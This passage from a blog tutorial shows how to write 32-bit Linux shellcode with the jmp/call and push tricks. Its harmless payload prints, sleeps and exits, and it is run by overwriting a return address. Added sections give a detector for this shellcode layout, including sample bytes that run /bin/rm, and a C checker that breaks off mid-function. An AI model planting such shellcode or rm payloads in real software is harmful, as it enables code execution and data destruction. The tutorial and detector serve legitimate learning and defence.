<span style="color: #200080; font-weight: bold;">long</span> tv_nsec<span style="color: #406080;">;</span> <span style="color: #595979;">/* nanoseconds */</span>
<span style="color: #406080;">}</span><span style="color: #406080;">;</span></pre><div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;"><i><b>P.S. I wrote a simple program to check the size of timespec and of each of its fields: time_t is 4 bytes and long is 4 bytes, so timespec is 8 bytes in total.</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b>Tip: you can write a C program that uses sizeof() to see the size of each variable type.</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;">The above is the information I needed.</span><br />
<br />
<span class="Apple-style-span" style="font-family: inherit;">Now, as usual, write an inline assembly program.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep1.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;"></span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/* the timespec structure: tv_sec = 2, tv_nsec = 0, two 4-byte fields */</span>
<span style="color: #200080; font-weight: bold;">char</span> t1_v<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: maroon;">"</span><span style="color: #0f69ff;">\x02</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">movl $t1_v, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre>Compile the source code and execute it; you will see that the program actually waits about 2 seconds and then exits.<br />
However, just like in the previous post, <a href="http://mike820324.blogspot.com/2011/06/shell-code-cont-3.html">Shell code 3(cont.)</a>, I don't want the data to live outside the shell code. Therefore, I use the same trick mentioned in that post, the relative jmp/call trick.<br />
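The relative jmp/call trick leaves a recognisable shape in any byte stream: a short jmp (0xEB disp8) that lands exactly on a call (0xE8 rel32) with a negative displacement, and a pop reg (0x58..0x5F) within a few bytes of the call target, followed by the NUL-separated strings the code needs. IDS shellcode signatures key on the same shape. The scanner below is an added example, not the post's code: it reports each match with the offsets involved and the strings behind the call, which is where this layout keeps its argv. The sample inputs are the two shellcodes printed in this post and a constructed benign buffer; like any such heuristic it can produce false positives on random binary data.

```python
"""Heuristic detector for the jmp/call/pop ("GetPC") shellcode layout."""
import struct

POP_REG = range(0x58, 0x60)     # pop %eax .. pop %edi


def _strings_after(code, start, limit=64):
    """Printable NUL-terminated ASCII strings from `start`, stopping at the first gap."""
    out = []
    for chunk in code[start:start + limit].split(b"\x00"):
        if chunk and all(0x20 <= b < 0x7F for b in chunk):
            out.append(chunk.decode("ascii"))
        else:
            break
    return out


def find_jmp_call_pop(code):
    """Return one dict per match: offsets of jmp, call and pop plus trailing strings."""
    # Map every short-jmp landing site to the offset of the jmp itself.
    jmp_to = {}
    for j in range(len(code) - 1):
        if code[j] == 0xEB:
            disp = struct.unpack_from("<b", code, j + 1)[0]
            jmp_to[j + 2 + disp] = j
    findings = []
    for i in range(len(code) - 4):
        if code[i] != 0xE8 or i not in jmp_to:
            continue                                    # no short jmp lands on this call
        rel = struct.unpack_from("<i", code, i + 1)[0]
        target = i + 5 + rel
        if not 0 <= target < i:
            continue                                    # only backward calls inside the buffer
        pop = next((k for k in range(target, min(target + 4, len(code)))
                    if code[k] in POP_REG), None)
        if pop is None:
            continue                                    # call target does not pop the address
        findings.append({"jmp": jmp_to[i], "call": i, "pop": pop,
                         "strings": _strings_after(code, i + 5)})
    return findings


# Sample inputs: the two shellcodes printed in this post, byte for byte.
ALL_SHELL = bytes.fromhex(
    "eb39 5e 89f1 31db f7e3 43 b004 b208 cd80 b002 50 b002 50 89e3 31c9 b0a2 cd80 "
    "31c0 8d7609 50 89f3 8d7608 56 53 b00b 89e1 8d5104 cd80 31db 8d4301 cd80 "
    "e8c2ffffff"
) + b"Run Han!\x00/bin/rm\x00./test\x00\x00\x00\x00\x00"

EXECVE3 = bytes.fromhex(
    "eb22 31c0 5e 89f3 8d7608 50 56 53 b80b000000 89e1 31d2 cd80 "
    "b801000000 bb00000000 cd80 e8d9ffffff"
) + b"/bin/rm\x00./test\x00\x00\x00\x00\x00"

# Constructed benign buffer with no such layout.
BENIGN = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n" * 4

if __name__ == "__main__":
    for name, buf in (("All_shell", ALL_SHELL), ("execve3", EXECVE3), ("benign", BENIGN)):
        print(name, find_jmp_call_pop(buf))
```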
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep2.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* relative jmp/call trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> pop </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .long 0x00000002,0x0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span> </pre><pre style="background-color: #f6f8ff; color: #000020; font-family: inherit; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">Compile the source code and test the result. (It works :D )</pre><span class="Apple-style-span" style="font-family: inherit;">Instead of using the relative jmp/call trick to get the address of the data, is there another way to get it?</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Why not just push the parameters onto the stack? Then %esp contains the address of our data. Let's use this push trick to write the code.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep3.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #595979;">/* push trick */</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> </span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><b>P.S. Remember that the stack grows down, so push the fields in reverse order: tv_nsec first, then tv_sec, so that %esp ends up pointing at the start of the struct timespec.</b><br />
Before writing the shellcode, I add a write system call to the inline assembly so the program prints a message as well.<br />
<span style="font-family: "Courier New",Courier,monospace;">sleep4.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/*</span>
<span style="color: #595979;"> * In this example I use both the </span>
<span style="color: #595979;"> * relative jmp/call trick and</span>
<span style="color: #595979;"> * push trick to get the data.</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $0;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> push $2;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">sp, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $162, </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 2:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> call 1b;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #1060b6;">;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><span class="Apple-style-span" style="font-family: inherit;">This is what the inline assembly looks like now; it has grown quite a bit.</span><br />
Again, compile the source code and test the result. If everything is correct, the program prints the message, waits about 2 seconds, and then exits.<br />
If it works, disassemble the binary with objdump -d to get the machine code.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-PNpfMVwtha4/TrFVdDAQukI/AAAAAAAAAJg/9eTaFYCBd_Q/s1600/shellcode3objdump.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="333" src="http://2.bp.blogspot.com/-PNpfMVwtha4/TrFVdDAQukI/AAAAAAAAAJg/9eTaFYCBd_Q/s400/shellcode3objdump.jpg" width="400" /></a></div><br />
Copy the machine code from the objdump output and paste it into another source file as the shellcode.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">sleep5.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #595979;">/* This is the shellcode */</span>
<span style="color: #200080; font-weight: bold;">char</span> shellcode<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xeb</span><span style="color: #0f69ff;">\x32</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x5e</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x04</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xba</span><span style="color: #0f69ff;">\x07</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xf1</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x6a</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x6a</span><span style="color: #0f69ff;">\x02</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\x89</span><span style="color: #0f69ff;">\xe3</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb9</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\xa2</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xb8</span><span style="color: #0f69ff;">\x01</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xbb</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: #0f69ff;">\x00</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xcd</span><span style="color: #0f69ff;">\x80</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #0f69ff;">\xe8</span><span style="color: #0f69ff;">\xc9</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: #0f69ff;">\xff</span><span style="color: maroon;">"</span>
<span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #308080;">*</span>ptr<span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> i<span style="color: #406080;">;</span>
<span style="color: #595979;">/* </span>
<span style="color: #595979;"> * overflow the return address</span>
<span style="color: #595979;"> * transfer the execution flow to shellcode</span>
<span style="color: #595979;"> */</span>
<span style="color: #200080; font-weight: bold;">for</span><span style="color: #308080;">(</span>i<span style="color: #308080;">=</span><span style="color: #008c00;">0</span><span style="color: #406080;">;</span>i<span style="color: #308080;"><</span><span style="color: #008c00;">10</span><span style="color: #406080;">;</span>i<span style="color: #308080;">+</span><span style="color: #308080;">+</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
ptr <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">*</span><span style="color: #308080;">)</span><span style="color: #308080;">&</span>ptr<span style="color: #308080;">+</span>i<span style="color: #406080;">;</span>
<span style="color: #308080;">*</span><span style="color: #308080;">(</span>ptr<span style="color: #308080;">)</span> <span style="color: #308080;">=</span> <span style="color: #308080;">(</span><span style="color: #200080; font-weight: bold;">int</span><span style="color: #308080;">)</span>shellcode<span style="color: #406080;">;</span>
<span style="color: #406080;">}</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="font-family: 'Courier New', Courier, monospace;"><br />
</div><span class="Apple-style-span" style="font-family: inherit;">Compile the source code and use execstack to mark the stack executable:</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -g -o sleep5.out sleep5.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">execstack -s sleep5.out</span><br />
<span class="Apple-style-span" style="font-family: inherit;">Two caveats on a current system: the shellcode uses int $0x80 with 32-bit registers, so on an x86_64 host build with -m32; and if your gcc enables the stack protector by default, add -fno-stack-protector, because the loop in main() overwrites the canary on its way to the return address. Also, execstack -s only guarantees an executable stack. Older 32-bit kernels made every readable mapping executable along with it, which is why the shellcode[] array in .data could run; recent kernels do not, so if the program faults at the shellcode address, copy the bytes into a stack buffer first.</span><br />
Execute the program and check that the result is what we expected.<br />
You can also step through it in gdb.<br />
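The two tricks above boil down to arithmetic on displacements: the jmp has to skip exactly the body, and the call has to jump back by exactly the body plus its own five bytes, which is where the 0x32 and 0xc9ffffff in the pasted bytes come from. The following C program is an added example and not part of the original post: it rebuilds the sleep5.c stub from its body and the string, decodes the page's bytes to confirm where the jmp and call land, and counts NUL bytes. The function names are my own; the bytes are copied from the listing above and are only inspected, never executed.

```c
/* Added example for this post (not code from the original): assemble the
 * "jmp / call" stub used by sleep5.c's shellcode from its pieces, decode it
 * back to verify the displacements, and count NUL bytes.  The bytes are only
 * inspected as data; nothing here executes shellcode. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The shellcode from sleep5.c, byte for byte.  sizeof-1 drops the C string
 * terminator, leaving the 64 bytes objdump showed. */
static const uint8_t page_shellcode[] =
    "\xeb\x32"                  /*    jmp 2f                      */
    "\x5e"                      /* 1: pop  %esi      -> &data     */
    "\xb8\x04\x00\x00\x00"      /*    movl $4,%eax   write        */
    "\xbb\x01\x00\x00\x00"      /*    movl $1,%ebx   stdout       */
    "\xba\x07\x00\x00\x00"      /*    movl $7,%edx   strlen       */
    "\x89\xf1" "\xcd\x80"       /*    movl %esi,%ecx; int $0x80   */
    "\x6a\x00" "\x6a\x02"       /*    push $0; push $2 (timespec) */
    "\x89\xe3"                  /*    movl %esp,%ebx              */
    "\xb9\x00\x00\x00\x00"      /*    movl $0,%ecx   rem = NULL   */
    "\xb8\xa2\x00\x00\x00"      /*    movl $162,%eax nanosleep    */
    "\xcd\x80"
    "\xb8\x01\x00\x00\x00"      /*    movl $1,%eax   exit         */
    "\xbb\x00\x00\x00\x00"      /*    movl $0,%ebx                */
    "\xcd\x80"
    "\xe8\xc9\xff\xff\xff"      /* 2: call 1b                     */
    "Run Han";
#define PAGE_LEN (sizeof page_shellcode - 1)
#define BODY_LEN 50            /* bytes between the jmp and the call */

/* Layout: jmp rel8 | body | call rel32 | data.  The jmp skips the body
 * (rel8 = blen); the call jumps back over the body and itself
 * (rel32 = -(blen + 5)) and leaves &data on the stack for the pop.
 * Returns the stub length, or 0 if the body does not fit a short jmp. */
size_t build_jmp_call_stub(const uint8_t *body, size_t blen,
                           const uint8_t *data, size_t dlen,
                           uint8_t *out, size_t cap)
{
    size_t total = 2 + blen + 5 + dlen;
    if (blen > 127 || total > cap) return 0;
    uint32_t rel32 = (uint32_t)-(int32_t)(blen + 5);
    out[0] = 0xeb; out[1] = (uint8_t)blen;
    memcpy(out + 2, body, blen);
    out[2 + blen] = 0xe8;
    for (int i = 0; i < 4; i++)                 /* little-endian rel32 */
        out[3 + blen + i] = (uint8_t)(rel32 >> (8 * i));
    memcpy(out + 7 + blen, data, dlen);
    return total;
}

/* Follow the jmp, expect a call there, follow the call back.  Returns 0 when
 * the call lands on the first body byte (offset 2); negative otherwise. */
int check_jmp_call_stub(const uint8_t *sc, size_t len,
                        size_t *jmp_to, size_t *call_to, size_t *data_off)
{
    if (len < 7 || sc[0] != 0xeb || (int8_t)sc[1] < 0) return -1;
    size_t jt = 2 + sc[1];
    if (jt + 5 > len || sc[jt] != 0xe8) return -2;
    uint32_t r = 0;
    for (int i = 0; i < 4; i++) r |= (uint32_t)sc[jt + 1 + i] << (8 * i);
    int64_t ct = (int64_t)(jt + 5) + (int32_t)r;
    if (ct < 0 || (size_t)ct >= len) return -3;
    *jmp_to = jt; *call_to = (size_t)ct; *data_off = jt + 5;
    return ct == 2 ? 0 : -4;
}

/* NUL bytes are harmless here (the compiler copies the array) but fatal if
 * the payload ever travels through strcpy()-style code. */
size_t count_nul_bytes(const uint8_t *sc, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++) n += (sc[i] == 0);
    return n;
}

/* Rebuild the page's stub from body + "Run Han" and compare byte for byte. */
int stub_matches_page(void)
{
    uint8_t out[128];
    size_t n = build_jmp_call_stub(page_shellcode + 2, BODY_LEN,
                                   (const uint8_t *)"Run Han", 7, out, sizeof out);
    return n == PAGE_LEN && memcmp(out, page_shellcode, PAGE_LEN) == 0;
}

/* Decode the page's stub: jmp -> 52 (the call), call -> 2 (the pop), data at 57. */
int page_stub_ok(void)
{
    size_t jt, ct, doff;
    if (check_jmp_call_stub(page_shellcode, PAGE_LEN, &jt, &ct, &doff) != 0) return 0;
    return jt == 52 && ct == 2 && doff == 57 &&
           memcmp(page_shellcode + doff, "Run Han", 7) == 0;
}

int main(void)
{
    size_t jt = 0, ct = 0, doff = 0;
    int rc = check_jmp_call_stub(page_shellcode, PAGE_LEN, &jt, &ct, &doff);
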